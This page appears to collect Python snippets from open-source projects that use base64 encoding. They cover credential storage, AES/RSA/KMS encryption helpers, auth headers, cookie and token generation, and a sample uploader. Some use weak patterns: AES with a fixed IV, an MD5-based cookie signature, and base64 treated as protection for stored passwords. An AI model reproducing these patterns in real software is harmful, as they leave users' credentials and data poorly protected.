        SubRepo.push(commit_message='Added news to %s' % dest,
                     merge_request=False)
项目:hesperides-cli    作者:voyages-sncf-technologies    | 项目源码 | 文件源码
def set_conf(profile, username, password, hesperides_endpoint, response_format):
    """Store the endpoint settings and credentials for *profile*.

    The endpoint and response format go to the config file; the user name
    and the base64 ``username:password`` token go to the credentials file.
    Finally an (empty) ``config`` section is updated in the config file.
    """
    token = base64.b64encode(str.encode('%s:%s' % (username, password))).decode('UTF-8')
    settings_section = {'endpoint': hesperides_endpoint, 'format': response_format}
    credentials_section = {'username': username, 'auth': token}

    config_writer = ConfigFileWriter()
    config_writer.update_config(profile, settings_section, False)

    credentials_writer = ConfigFileWriter()
    credentials_writer.update_credentials(profile, credentials_section, False)

    # NOTE(review): a third writer is created but the final update goes
    # through the first one - possibly a copy/paste slip; behaviour kept
    # as-is, confirm intent.
    ConfigFileWriter()
    config_writer.update_config('config', {}, False)
项目:Stitch    作者:nathanlopez    | 项目源码 | 文件源码
def encrypt(raw, aes_key=secret):
    """Encrypt *raw* with AES-CFB and return base64(iv + ciphertext).

    A fresh random IV of one AES block is generated for every call and
    prepended to the ciphertext before encoding.
    """
    iv = Random.new().read(AES.block_size)
    ciphertext = AES.new(aes_key, AES.MODE_CFB, iv).encrypt(raw)
    return base64.b64encode(iv + ciphertext)
项目:alelo_ofx    作者:dantas    | 项目源码 | 文件源码
def login(cpf, password):
    """Authenticate against the Alelo web API using the shared session.

    The password is sent base64-encoded together with an empty captcha
    response.  Raises WebApiFailure when the reply status is not 200.
    """
    credentials = {
        'cpf': cpf,
        'pwd': base64.b64encode(password),
        'captchaResponse': '',
    }
    response = session.post(
        'https://www.meualelo.com.br/meualelo.services/rest/login/authenticate',
        json=credentials)
    if response.status_code != 200:
        raise WebApiFailure()
项目:flash_services    作者:textbook    | 项目源码 | 文件源码
def headers(self):
        """Return the parent's request headers plus Basic authorization."""
        encoding = 'utf8'
        merged = super().headers
        credentials = '{}:{}'.format(self.username, self.password)
        # base64 works on bytes; convert back to text for the header value
        encoded = b64encode(credentials.encode(encoding)).decode(encoding)
        merged['Authorization'] = 'Basic {}'.format(encoded)
        return merged
项目:Cortex-Analyzers    作者:CERT-BDF    | 项目源码 | 文件源码
def submit_sample(self, filepath, filename, tags=('JAMIE_Import', 'TheHive_Import')):
        """
        Uploads a new sample to VMRay api. Filename gets sent base64 encoded.

        :param filepath: path to sample
        :type filepath: str
        :param filename: filename of the original file
        :type filename: str
        :param tags: Tags to apply to the sample; pass an empty value to
                     send none
        :type tags: list(str)
        :returns: Dictionary of results
        :rtype: dict
        :raises SampleFileNotFoundError: if filepath is not an existing file
        :raises BadResponseError: if the API does not answer with HTTP 200
        """
        apiurl = '/rest/sample/submit?sample_file'
        params = {'sample_filename_b64enc': base64.b64encode(filename.encode('utf-8')),
                  'reanalyze': self.reanalyze}
        if tags:
            params['tags'] = ','.join(tags)

        if not os.path.isfile(filepath):
            raise SampleFileNotFoundError('Given sample file was not found.')

        # Open the sample in a context manager so the handle is closed once
        # the upload finished, whether it succeeded or not.
        with open(filepath, mode='rb') as sample:
            res = self.session.post(url=self.url + apiurl,
                                    files=[('sample_file', sample)],
                                    params=params)
        if res.status_code == 200:
            return json.loads(res.text)
        raise BadResponseError('Response from VMRay was not HTTP 200.'
                               ' Responsecode: {}; Text: {}'.format(res.status_code, res.text))
项目:rust_pypi_example    作者:mckaymatt    | 项目源码 | 文件源码
def encrypt(pubkey, password):
    """Return *password* RSA-encrypted with *pubkey*, base64-encoded.

    The key is loaded from *pubkey* and PKCS#1 v1.5 padding is used.  Only
    the holder of the matching private key (in this case, only Travis) can
    decrypt the result.
    """
    ciphertext = load_key(pubkey).encrypt(password, PKCS1v15())
    return base64.b64encode(ciphertext)
项目:newsreap    作者:caronc    | 项目源码 | 文件源码
def encode_private_key(self):
        """
        Return the private key gzip-compressed and then base64-encoded.

        Based on spotnab, this is the gzipped version of the key
        with base64 applied to it. We encode it as such and
        return it.

        Returns None when writing the key raises TypeError (the key was
        not initialized yet).
        """
        # Imported here so this method does not depend on the file's
        # top-level import list.
        from io import BytesIO

        # gzip produces binary output, so it has to be collected in a bytes
        # buffer; a text buffer rejects it on Python 3.
        fileobj = BytesIO()
        with GzipFile(fileobj=fileobj, mode="wb") as f:
            try:
                f.write(self.private_pem())
            except TypeError:
                # It wasn't initialized yet
                return None
        # The gzip stream is complete only after the `with` block closed it.
        return b64encode(fileobj.getvalue())
项目:Starfish    作者:BillWang139967    | 项目源码 | 文件源码
def encrypt(raw):
    """Pad *raw*, encrypt it with AES-CBC under KEY, return base64(iv + ciphertext).

    A fresh random IV of one AES block is generated for every call.
    """
    padded = pad(raw)
    iv = Random.new().read(AES.block_size)
    ciphertext = AES.new(KEY, AES.MODE_CBC, iv).encrypt(padded)
    return base64.b64encode(iv + ciphertext)
项目:Starfish    作者:BillWang139967    | 项目源码 | 文件源码
def encrypt(raw):
    """Pad *raw*, encrypt it with AES-CBC under KEY, return base64(iv + ciphertext).

    A fresh random IV of one AES block is generated for every call.
    """
    padded = pad(raw)
    iv = Random.new().read(AES.block_size)
    ciphertext = AES.new(KEY, AES.MODE_CBC, iv).encrypt(padded)
    return base64.b64encode(iv + ciphertext)
项目:aws-consolidated-admin    作者:awslabs    | 项目源码 | 文件源码
def encrypt(plaintext):
    """Encrypt *plaintext* with the KMS key and return the blob base64-encoded."""
    response = kms.encrypt(KeyId=KMS_KEY_ID, Plaintext=plaintext)
    return base64.b64encode(response['CiphertextBlob'])
项目:python-    作者:secondtonone1    | 项目源码 | 文件源码
def _b64_encode_bytes(b):
    """Return the base64 encoding of the bytes *b* as an ASCII text string."""
    encoded = base64.b64encode(b)
    return encoded.decode("ascii")
项目:DCPanel    作者:vladgr    | 项目源码 | 文件源码
def encrypt(text):
    """Encrypt the string *text* with AES-CFB and return base64 text.

    The key and IV both come from the project settings.
    """
    cipher = AES.new(settings.CRYPT_KEY, AES.MODE_CFB, settings.CRYPT_IV)
    ciphertext = cipher.encrypt(text.encode())
    return base64.b64encode(ciphertext).decode()
项目:calendary    作者:DavidHickman    | 项目源码 | 文件源码
def encrypt(pubkey, password):
    """Return *password* RSA-encrypted with *pubkey*, base64-encoded.

    The key is loaded from *pubkey* and PKCS#1 v1.5 padding is used.  Only
    the holder of the matching private key (in this case, only Travis) can
    decrypt the result.
    """
    ciphertext = load_key(pubkey).encrypt(password, PKCS1v15())
    return base64.b64encode(ciphertext)
项目:ios-xr-grpc-python    作者:cisco-grpc-connection-libs    | 项目源码 | 文件源码
def _FieldToJsonObject(self, field, value):
    """Converts field value according to Proto3 JSON Specification.

    Dispatches on ``field.cpp_type``: messages are converted through
    ``_MessageToJsonObject``, enums become their value name, bytes are
    base64 encoded, 64-bit integers become strings, and infinite/NaN
    floats become the module's sentinel constants. Anything else is
    returned unchanged.

    Raises:
      SerializeToJsonError: an enum field holds a number that has no
        corresponding enum value.
    """
    cpp_type = field.cpp_type
    field_descriptor = descriptor.FieldDescriptor

    if cpp_type == field_descriptor.CPPTYPE_MESSAGE:
      return self._MessageToJsonObject(value)

    if cpp_type == field_descriptor.CPPTYPE_ENUM:
      enum_value = field.enum_type.values_by_number.get(value, None)
      if enum_value is None:
        raise SerializeToJsonError('Enum field contains an integer value '
                                   'which can not mapped to an enum value.')
      return enum_value.name

    if cpp_type == field_descriptor.CPPTYPE_STRING:
      if field.type != field_descriptor.TYPE_BYTES:
        return value
      # Use base64 Data encoding for bytes
      return base64.b64encode(value).decode('utf-8')

    if cpp_type == field_descriptor.CPPTYPE_BOOL:
      return bool(value)

    if cpp_type in _INT64_TYPES:
      return str(value)

    if cpp_type in _FLOAT_TYPES:
      if math.isinf(value):
        return _NEG_INFINITY if value < 0.0 else _INFINITY
      if math.isnan(value):
        return _NAN

    # Finite floats and every remaining type pass through untouched.
    return value
项目:docklet    作者:unias    | 项目源码 | 文件源码
def generate_cookie(name, securekey):
    """Build a cookie string of the form ``<base64 payload>.<md5 digest>``.

    The payload is a JSON object holding ``name`` and the current
    ``time.asctime()`` under ``'login-time'``. The digest is the MD5 hex
    digest of the JSON text concatenated with ``securekey``.
    """
    payload = json.dumps({'name': name, 'login-time': time.asctime()})
    # b64encode yields bytes; decode so both halves of the cookie are str.
    encoded_payload = base64.b64encode(payload.encode('ascii')).decode('utf-8')
    digest = hashlib.md5((payload + securekey).encode('ascii')).hexdigest()
    return encoded_payload + "." + digest
项目:docklet    作者:unias    | 项目源码 | 文件源码
def generate_auth_token(self, expiration=3600):
        """Return a base64-encoded token carrying this object's ``id``.

        A ``Serializer`` keyed with ``app.config['SECRET_KEY']`` and
        configured with ``expires_in=expiration`` dumps ``{'id': self.id}``;
        the dumped value is base64 encoded and decoded to text as UTF-8.
        """
        serializer = Serializer(app.config['SECRET_KEY'], expires_in=expiration)
        # Named ``signed`` rather than ``str`` so the builtin is not shadowed.
        signed = serializer.dumps({'id': self.id})
        return b64encode(signed).decode('utf-8')
项目:pytest-selenium-pdiff    作者:rentlytics    | 项目源码 | 文件源码
def get_image_as_base64(filename):
    """Read ``filename`` in binary mode and return its base64 text (ASCII)."""
    with open(filename, 'rb') as image_file:
        raw = image_file.read()
    return str(base64.b64encode(raw), 'ascii')
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def _temporary_keychain():
    """
    This function creates a temporary Mac keychain that we can use to work with
    credentials. This keychain uses a one-time password and a temporary file to
    store the data. We expect to have one keychain per socket. The returned
    SecKeychainRef must be freed by the caller, including calling
    SecKeychainDelete.

    Returns a tuple of the SecKeychainRef and the path to the temporary
    directory that contains it.
    """
    # Unfortunately, SecKeychainCreate requires a path to a keychain. This
    # means we cannot use mkstemp to use a generic temporary file. Instead,
    # we're going to create a temporary directory and a filename to use there.
    # This filename will be 8 random bytes expanded into hex. We also need
    # some random bytes to password-protect the keychain we're creating, so we
    # ask for 40 random bytes.
    random_bytes = os.urandom(40)
    # The filename is hex encoded rather than base64 encoded: the base64
    # alphabet contains '/', which os.path.join would treat as a directory
    # separator and so point at a subdirectory that does not exist.
    filename = base64.b16encode(random_bytes[:8]).decode('utf-8')
    password = base64.b64encode(random_bytes[8:])  # Must be valid UTF-8
    tempdirectory = tempfile.mkdtemp()

    keychain_path = os.path.join(tempdirectory, filename).encode('utf-8')

    # We now want to create the keychain itself.
    keychain = Security.SecKeychainRef()
    status = Security.SecKeychainCreate(
        keychain_path,
        len(password),
        password,
        False,
        None,
        ctypes.byref(keychain)
    )
    _assert_no_error(status)

    # Having created the keychain, we want to pass it off to the caller.
    return keychain, tempdirectory
项目:my-first-blog    作者:AnkurBegining    | 项目源码 | 文件源码
def _b64_encode_bytes(b):
    """Base64 encode the bytes ``b`` and return the result as ASCII text."""
    encoded_bytes = base64.b64encode(b)
    text = encoded_bytes.decode("ascii")
    return text
项目:openstack-deploy    作者:yaoice    | 项目源码 | 文件源码
def read_file(filename):
    """Read a file under ``/etc/ceph`` and return its encoded content.

    ``filename`` is joined onto ``/etc/ceph``. If the resulting path
    does not exist or is not readable, ``json_exit`` is called with a
    message and ``failed=True``.

    Returns a dict with:
      * ``'content'``  - base64 of the zlib-compressed file bytes
      * ``'sha1'``     - SHA-1 hex digest of the uncompressed bytes
      * ``'filename'`` - the ``filename`` argument as given
    """
    full_path = os.path.join('/etc/ceph', filename)

    if not os.path.exists(full_path):
        json_exit("file not found: {}".format(full_path), failed=True)
    if not os.access(full_path, os.R_OK):
        json_exit("file not readable: {}".format(full_path), failed=True)

    with open(full_path, 'rb') as handle:
        payload = handle.read()

    encoded = base64.b64encode(zlib.compress(payload))
    digest = hashlib.sha1(payload).hexdigest()
    return {'content': encoded, 'sha1': digest, 'filename': filename}